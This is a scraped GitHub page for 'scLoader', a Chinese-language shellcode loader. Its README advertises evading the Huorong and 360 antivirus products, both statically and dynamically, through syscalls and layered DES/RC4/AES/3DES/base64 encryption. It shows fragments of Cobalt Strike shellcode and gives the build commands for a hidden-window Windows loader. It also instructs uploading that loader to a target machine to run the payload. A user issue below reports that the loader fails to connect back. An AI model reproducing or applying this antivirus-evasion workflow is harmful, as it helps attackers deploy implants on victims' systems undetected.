scloader's Introduction

scLoader: shellcode 加载器

效果

目前测试了火绒和360，静态动态都能免杀，静态VT检测效果一般

特点

基于Syscall进行免杀shellcode加载
已经实现的加密/编码：des,rc4,aes,3des,base64
在已实现的加密方式中，加密顺序可以随意指定

支持shellcode格式

目前支持CS中C语言格式和Raw格式的shellcode

C语言字符串格式shellcode

/* length: 891 bytes */
unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52......";

纯十六进制格式的shellcodes

fc48 83e4 f0e8 c800 0000 4151 4150 5251
5648 31d2 6548 8b52 6048 8b52 1848 8b52
2048 8b72 5048 0fb7 4a4a 4d31 c948 31c0
ac3c 617c 022c 2041 c1c9 0d41 01c1 e2ed

使用

1、编译sparrow.go(不想编译直接go run也行)

找到项目中builder/sparrow.go文件，然后如图编译即可

2、使用sparrow.exe加密shellcode

在CS中生成需要格式的shellcode，将CS生成的原始.bin文件或.c文件放在sparrow.exe同一目录，使用命令

#.bin文件
.\sparrow.exe -e des,rc4,aes,3des,base64 -f .\payload.bin
#.c文件
.\sparrow.exe -e des,rc4,aes,3des,base64 -f .\payload.c

注意：-e参数必须使用base64编码结尾

3、将加密之后的shellcode填充到/loader/loader.go中的shellcode变量

4、将-e参数的值(加密顺序)填充到/loader/loader.go中的encodestr变量中

5、编译/loader/loader.go文件

go build -trimpath -ldflags="-w -s -H=windowsgui" ./loader/loader.go

6、上传到目标机器，使用loader.exe -token命令加载shellcode

scloader's People

Contributors

Stargazers

Watchers

scloader's Issues

shellcode编码之后是不是有错误

按照正常流程编译为二进制文件之后运行是无法上线CS的，感觉有问题，大家小心一点

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.

Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

TensorFlow

An Open Source Machine Learning Framework for Everyone

Django

The Web framework for perfectionists with deadlines.

Laravel

A PHP framework for web artisans

D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

web

Some thing interesting about web. New door for the world.

server

A server is a program made to process requests and deliver data to clients.

Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

Visualization

Some thing interesting about visualization, use data art

Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.

Microsoft

Open source projects and samples from Microsoft.

Google

Google ❤️ Open Source for everyone.

Alibaba

Alibaba Open Source for everyone

D3

Data-Driven Documents codes.

Tencent

China tencent open source team.

peithon / scloader Goto Github PK